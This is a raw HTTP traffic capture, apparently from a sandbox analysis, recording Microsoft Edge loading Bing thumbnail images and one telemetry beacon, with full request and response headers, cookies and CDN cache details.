report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1753
cache-control: public, max-age=660008
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f4c2
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1753
x-check-cacheable: YES
cache-control: public, max-age=1195792
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f4d1
-
GEThttps://th.bing.com/th?id=OIP.elucaXozpAzop1bZYDv0dgHaDt&w=80&h=80&c=1&vt=10&bgcl=7bc899&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.elucaXozpAzop1bZYDv0dgHaDt&w=80&h=80&c=1&vt=10&bgcl=7bc899&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1868
cache-control: public, max-age=1209590
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f4d0
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 725
x-check-cacheable: YES
cache-control: public, max-age=2580157
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f4dd
-
GEThttps://th.bing.com/th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=08029d&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=08029d&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1868
cache-control: public, max-age=1209600
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f4d2
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f523
-
GEThttps://th.bing.com/th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=cb8747&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=cb8747&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 552
cache-control: public, max-age=1085068
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MEM_HIT from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f5aa
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 712
cache-control: public, max-age=1362464
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_HIT from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f5a9
x-check-cacheable: YES
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627345%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627377%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627345%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627377%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1638
cache-control: public, max-age=1362471
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MEM_HIT from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f5c4
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
